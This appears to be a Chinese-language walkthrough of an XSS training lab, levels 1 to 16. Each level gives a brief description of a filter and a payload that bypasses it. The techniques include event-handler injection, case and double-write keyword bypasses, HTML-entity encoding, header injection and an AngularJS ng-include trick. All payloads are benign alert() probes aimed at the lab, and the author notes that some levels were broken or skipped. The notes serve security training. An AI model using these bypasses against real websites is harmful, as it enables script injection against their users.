level1

<img src=1 onerror=alert('1')>

level2

闭合

"/><img src="1" onerror="alert(1)" />

level3

过滤< >

' onfocus=javascript:alert('xss') class='

level4

" onfocus=javascript:alert('xss') class="

level5

过滤事件 onfocus/script 等关键字 添加_干扰

"> <a href=javascript:alert('xss')>xss</a> //

level6

过滤 href 大写绕过

"> <a Href=javascript:alert('xss')>xss</a> //

level7

直接删除关键字 双写绕过

"> <a hrhrefef=javascrscriptipt:alert('xss')>xss</a> //

level8

过滤引号 <> 关键字添加_干扰 对 javascript unicode 编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;

level9

检查有无 url,加一个即可 unicode 编码能绕过替换关键词

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;//http://

level10

hidden input

t_sort=" onfocus=javascript:alert('xss') //

level11

看源码改 refer 头

"type="text" onclick=javascript:alert('xss')//

level12

直接改 ua 头

"type="text" onclick=javascript:alert('xss')//

level13

应该是改 cookie, 题目有点问题

"type="text" onclick=javascript:alert('xss')//

level14

看 wp 是文件解析引发 xss

在图片的 exif 信息里加 xss

但是链接挂了 x 不了

'"><img src="1" onerror="alert(document.domain)" />'

level15

AngularJS 的 javascript 框架漏洞

ng-include 可以将部分代码打包成独立文件,在使用 ng-include 来引用这个独立的 HTML 文件, 类似文件包含漏洞

环境有点问题

src='level4.php?keyword=%22%20onmouseover=alert(1)%20%22'

level16

过滤空格

<img src="1" onerror="alert(1)" />
<img%0asrc ="1%0aonerror" ="alert(1)"></img%0asrc>

level17/8/9/0

都用的 flash,浏览器不支持,懒得做了